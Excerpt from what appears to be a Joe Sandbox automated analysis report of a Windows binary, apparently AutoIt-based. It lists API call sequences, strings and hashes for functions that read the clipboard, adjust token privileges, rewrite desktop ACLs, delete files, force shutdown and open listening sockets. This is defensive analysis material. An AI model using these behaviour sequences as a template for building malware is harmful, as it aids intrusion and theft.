                          • FindClose.KERNEL32(00000000), ref: 00B46D53
                          • FindClose.KERNEL32(00000000), ref: 00B46D61
                          Strings
                          Similarity
                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                          • String ID: \*.*
                          • API String ID: 1867810238-1173974218
                          • Opcode ID: bdfcf61e7b421ecf01b51afceb5f1fdcc76eeaf2ab4b3e13f101d1b6f8d995ae
                          • Instruction ID: ef871fb03224098317aa019a364171eb561e780c6dddfb210a909747d7aec177
                          • Opcode Fuzzy Hash: bdfcf61e7b421ecf01b51afceb5f1fdcc76eeaf2ab4b3e13f101d1b6f8d995ae
                          • Instruction Fuzzy Hash: 7A512072D04168AACB21EBA0DC85EEE77FCAF0A300F4445E6E549E3051DB349B89DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • OpenClipboard.USER32(00B9DBF0), ref: 00B570C3
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B570D1
                          • GetClipboardData.USER32(0000000D), ref: 00B570D9
                          • CloseClipboard.USER32 ref: 00B570E5
                          • GlobalFix.KERNEL32(00000000), ref: 00B57101
                          • CloseClipboard.USER32 ref: 00B5710B
                          • GlobalUnWire.KERNEL32(00000000), ref: 00B57120
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00B5712D
                          • GetClipboardData.USER32(00000001), ref: 00B57135
                          • GlobalFix.KERNEL32(00000000), ref: 00B57142
                          • GlobalUnWire.KERNEL32(00000000), ref: 00B57176
                          • CloseClipboard.USER32 ref: 00B57283
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                          • String ID:
                          • API String ID: 941120096-0
                          • Opcode ID: 42fef9bba3e09053041e311bd617ae973712d63064998c5074f906325a31d5f0
                          • Instruction ID: d81bed240236462e047b8cc0f4edb85f8efcf4d932ffa6f4a6232107ab5bb732
                          • Opcode Fuzzy Hash: 42fef9bba3e09053041e311bd617ae973712d63064998c5074f906325a31d5f0
                          • Instruction Fuzzy Hash: A251A171348205ABD311FF64EC96F6E77E8AB44B11F00059AF946E71E1EF61D909CB22
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B3BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B3BF0F
                            • Part of subcall function 00B3BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B3BF3C
                            • Part of subcall function 00B3BEC3: GetLastError.KERNEL32 ref: 00B3BF49
                          • _memset.LIBCMT ref: 00B3BA34
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B3BA86
                          • CloseHandle.KERNEL32(?), ref: 00B3BA97
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B3BAAE
                          • GetProcessWindowStation.USER32 ref: 00B3BAC7
                          • SetProcessWindowStation.USER32(00000000), ref: 00B3BAD1
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B3BAEB
                            • Part of subcall function 00B3B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00B3B8C5
                            • Part of subcall function 00B3B8B0: CloseHandle.KERNEL32(?), ref: 00B3B8D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                          • String ID: $default$winsta0
                          • API String ID: 2063423040-1027155976
                          • Opcode ID: 5a2bc65a2de4ce3fa803a16f97423c56f9782fd6cc782628c75272956e00b7a2
                          • Instruction ID: e0be38423e0e80ad80136dccb44ab1955f2d02bd7f1be983f7a42360edf6eb08
                          • Opcode Fuzzy Hash: 5a2bc65a2de4ce3fa803a16f97423c56f9782fd6cc782628c75272956e00b7a2
                          • Instruction Fuzzy Hash: 4B816C7190020CAFDF219FA4DD45EEEBBB9EF08304F64459AFA14A61A5DB318E15DB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00B4FE03
                          • FindClose.KERNEL32(00000000), ref: 00B4FE57
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B4FE7C
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B4FE93
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B4FEBA
                          • __swprintf.LIBCMT ref: 00B4FF06
                          • __swprintf.LIBCMT ref: 00B4FF3F
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • __swprintf.LIBCMT ref: 00B4FF93
                            • Part of subcall function 00B2234B: __woutput_l.LIBCMT ref: 00B223A4
                          • __swprintf.LIBCMT ref: 00B4FFE1
                          • __swprintf.LIBCMT ref: 00B50030
                          • __swprintf.LIBCMT ref: 00B5007F
                          • __swprintf.LIBCMT ref: 00B500CE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                          • API String ID: 108614129-2428617273
                          • Opcode ID: d8272fbafbde1a00dce93cb2c5513c41514ef4e54e0ed5313e2ba313b49162cd
                          • Instruction ID: 4a5d3f64fd9c191c6b79a1986b97cc0169665a72ef8e597255431d10739c3c93
                          • Opcode Fuzzy Hash: d8272fbafbde1a00dce93cb2c5513c41514ef4e54e0ed5313e2ba313b49162cd
                          • Instruction Fuzzy Hash: 6EA10FB2508344ABC710EFA4D885DAFB7EDAF98700F44099DF595C3191EB34EA49CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B52065
                          • _wcscmp.LIBCMT ref: 00B5207A
                          • _wcscmp.LIBCMT ref: 00B52091
                          • GetFileAttributesW.KERNEL32(?), ref: 00B520A3
                          • SetFileAttributesW.KERNEL32(?,?), ref: 00B520BD
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B520D5
                          • FindClose.KERNEL32(00000000), ref: 00B520E0
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00B520FC
                          • _wcscmp.LIBCMT ref: 00B52123
                          • _wcscmp.LIBCMT ref: 00B5213A
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B5214C
                          • SetCurrentDirectoryW.KERNEL32(00BB3A68), ref: 00B5216A
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B52174
                          • FindClose.KERNEL32(00000000), ref: 00B52181
                          • FindClose.KERNEL32(00000000), ref: 00B52191
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1803514871-438819550
                          • Opcode ID: 06f5f63958aeda55c755c9336a6f8af406d262ae03e295a1aa31b3738f353022
                          • Instruction ID: cca7c4a01aba8109b02b2832d28ec73894bf3426bc3ac9753e9cb353ef32487f
                          • Opcode Fuzzy Hash: 06f5f63958aeda55c755c9336a6f8af406d262ae03e295a1aa31b3738f353022
                          • Instruction Fuzzy Hash: 4D319F32502619BADB14ABA4EC49BEE73ECDF06361F1440D6E915F30E0DA70DA89CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • DragQueryPoint.SHELL32(?,?), ref: 00B6F14B
                            • Part of subcall function 00B6D5EE: ClientToScreen.USER32(?,?), ref: 00B6D617
                            • Part of subcall function 00B6D5EE: GetWindowRect.USER32(?,?), ref: 00B6D68D
                            • Part of subcall function 00B6D5EE: PtInRect.USER32(?,?,00B6EB2C), ref: 00B6D69D
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B6F1B4
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B6F1BF
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B6F1E2
                          • _wcscat.LIBCMT ref: 00B6F212
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B6F229
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B6F242
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00B6F259
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00B6F27B
                          • DragFinish.SHELL32(?), ref: 00B6F282
                          • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00B6F36D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                          • API String ID: 2166380349-3440237614
                          • Opcode ID: 4e699cb70c290e657b52a86f857381a4782b0f9c4585408827e752bb793216ba
                          • Instruction ID: fbf8a88d0f775d22d6cd127e2a624e216e9951b613bf059e73dbff8f3b81cd6a
                          • Opcode Fuzzy Hash: 4e699cb70c290e657b52a86f857381a4782b0f9c4585408827e752bb793216ba
                          • Instruction Fuzzy Hash: 23614A72508305AFC710EF64DC85EABBBE8FF89710F400A5EF595931A1DB709A45CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B521C0
                          • _wcscmp.LIBCMT ref: 00B521D5
                          • _wcscmp.LIBCMT ref: 00B521EC
                            • Part of subcall function 00B47606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B47621
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B5221B
                          • FindClose.KERNEL32(00000000), ref: 00B52226
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00B52242
                          • _wcscmp.LIBCMT ref: 00B52269
                          • _wcscmp.LIBCMT ref: 00B52280
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B52292
                          • SetCurrentDirectoryW.KERNEL32(00BB3A68), ref: 00B522B0
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B522BA
                          • FindClose.KERNEL32(00000000), ref: 00B522C7
                          • FindClose.KERNEL32(00000000), ref: 00B522D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 1824444939-438819550
                          • Opcode ID: 13f4e11d29203d8a33750e2293bb83085c2331561088e9430a2eb73f2a91aa5d
                          • Instruction ID: 89cd6e80f13a8e6ef22db40d1ff6c23f17b0151c82031e8c6806a77db22a7c31
                          • Opcode Fuzzy Hash: 13f4e11d29203d8a33750e2293bb83085c2331561088e9430a2eb73f2a91aa5d
                          • Instruction Fuzzy Hash: 303191359062197ACB14ABA4EC48BEE77EC9F06321F1001D5E914B31A0DA71DA89CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove_memset
                          • String ID: Q\E$[$\$\$\$]$^
                          • API String ID: 3555123492-286096704
                          • Opcode ID: 6909eb480159d669da440074fba562a30b6ae8bde3a9fd3199759f4c79942277
                          • Instruction ID: 0352acbe8abf313c43ac138ead9c2975725a759b649a354de62c98ee197b3d17
                          • Opcode Fuzzy Hash: 6909eb480159d669da440074fba562a30b6ae8bde3a9fd3199759f4c79942277
                          • Instruction Fuzzy Hash: 46729B71E14219CBDF28DF98C8806ADBBF1FF44314F2481E9D855AB291E734AE85DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4915c77d0afae5b94e33fd0b8d652b154b68cfff31c35dfed21fd2b5d6af03e4
                          • Instruction ID: e27999ab9b635bb60cdfe1078b1ebbebed994285afcb4eb5a6c87b96036816ca
                          • Opcode Fuzzy Hash: 4915c77d0afae5b94e33fd0b8d652b154b68cfff31c35dfed21fd2b5d6af03e4
                          • Instruction Fuzzy Hash: 4E323E75A022688BDB249F54EC81AEDBBF5FB4A310F1441D9E40EE7A91D7709E80CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B6ED0C
                          • GetFocus.USER32 ref: 00B6ED1C
                          • GetDlgCtrlID.USER32(00000000), ref: 00B6ED27
                          • _memset.LIBCMT ref: 00B6EE52
                          • GetMenuItemInfoW.USER32 ref: 00B6EE7D
                          • GetMenuItemCount.USER32(00000000), ref: 00B6EE9D
                          • GetMenuItemID.USER32(?,00000000), ref: 00B6EEB0
                          • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00B6EEE4
                          • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00B6EF2C
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B6EF64
                          • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00B6EF99
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                          • String ID: 0
                          • API String ID: 3616455698-4108050209
                          • Opcode ID: 25dfa202e751577e3d32d705d13c32c0839920f25dffb9bfa3d52740eaac80cb
                          • Instruction ID: 3a458af7ada52ca8edbaad8f69973f59648097075a6d6e492dabaa980807c203
                          • Opcode Fuzzy Hash: 25dfa202e751577e3d32d705d13c32c0839920f25dffb9bfa3d52740eaac80cb
                          • Instruction Fuzzy Hash: 2781B275108311AFEB10DF14D884EABBBE4FF88354F1009AEF9A9972A1D735D905CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B3B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B3B903
                            • Part of subcall function 00B3B8E7: GetLastError.KERNEL32(?,00B3B3CB,?,?,?), ref: 00B3B90D
                            • Part of subcall function 00B3B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00B3B3CB,?,?,?), ref: 00B3B91C
                            • Part of subcall function 00B3B8E7: RtlAllocateHeap.NTDLL(00000000,?,00B3B3CB), ref: 00B3B923
                            • Part of subcall function 00B3B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B3B93A
                            • Part of subcall function 00B3B982: GetProcessHeap.KERNEL32(00000008,00B3B3E1,00000000,00000000,?,00B3B3E1,?), ref: 00B3B98E
                            • Part of subcall function 00B3B982: RtlAllocateHeap.NTDLL(00000000,?,00B3B3E1), ref: 00B3B995
                            • Part of subcall function 00B3B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B3B3E1,?), ref: 00B3B9A6
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B3B3FC
                          • _memset.LIBCMT ref: 00B3B411
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B3B430
                          • GetLengthSid.ADVAPI32(?), ref: 00B3B441
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00B3B47E
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B3B49A
                          • GetLengthSid.ADVAPI32(?), ref: 00B3B4B7
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B3B4C6
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B3B4CD
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B3B4EE
                          • CopySid.ADVAPI32(00000000), ref: 00B3B4F5
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B3B526
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B3B54C
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B3B560
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00B031DA
                            • Part of subcall function 00B47C0C: GetFileAttributesW.KERNEL32(?,00B46A7B), ref: 00B47C0D
                          • _wcscat.LIBCMT ref: 00B46E7E
                          • __wsplitpath.LIBCMT ref: 00B46E99
                          • FindFirstFileW.KERNEL32(?,?), ref: 00B46EAE
                          • _wcscpy.LIBCMT ref: 00B46EDD
                          • _wcscat.LIBCMT ref: 00B46EEF
                          • _wcscat.LIBCMT ref: 00B46F01
                          • DeleteFileW.KERNEL32(?), ref: 00B46F0E
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B46F22
                          • FindClose.KERNEL32(00000000), ref: 00B46F3D
                          Strings
                          Similarity
                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                          • String ID: \*.*

                          Strings
                          Similarity
                          • API ID:
                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)

                          APIs
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:

                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B524F6
                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B52526
                          • _wcscmp.LIBCMT ref: 00B5253A
                          • _wcscmp.LIBCMT ref: 00B52555
                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B525F3
                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B52609
                          Strings
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                          • String ID: *.*

                          APIs
                          Similarity
                          • API ID: _memmove
                          • String ID:

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • GetSystemMetrics.USER32(0000000F), ref: 00B6FFCB
                          • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00B701EB
                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B70209
                          • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00B70234
                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B7025D
                          • ShowWindow.USER32(00000003,00000000), ref: 00B7027F
                          • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00B7029E
                          Similarity
                          • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                          • String ID:

                          APIs
                            • Part of subcall function 00B3BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B3BF0F
                            • Part of subcall function 00B3BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B3BF3C
                            • Part of subcall function 00B3BEC3: GetLastError.KERNEL32 ref: 00B3BF49
                          • ExitWindowsEx.USER32(?,00000000), ref: 00B4830C
                          Strings
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $@$SeShutdownPrivilege

                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B59235
                          • WSAGetLastError.WS2_32(00000000), ref: 00B59244
                          • bind.WS2_32(00000000,?,00000010), ref: 00B59260
                          • listen.WS2_32(00000000,00000005), ref: 00B5926F
                          • WSAGetLastError.WS2_32(00000000), ref: 00B59289
                          • closesocket.WS2_32(00000000), ref: 00B5929D
                          Similarity
                          • API ID: ErrorLast$bindclosesocketlistensocket
                          • String ID:

                          APIs
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
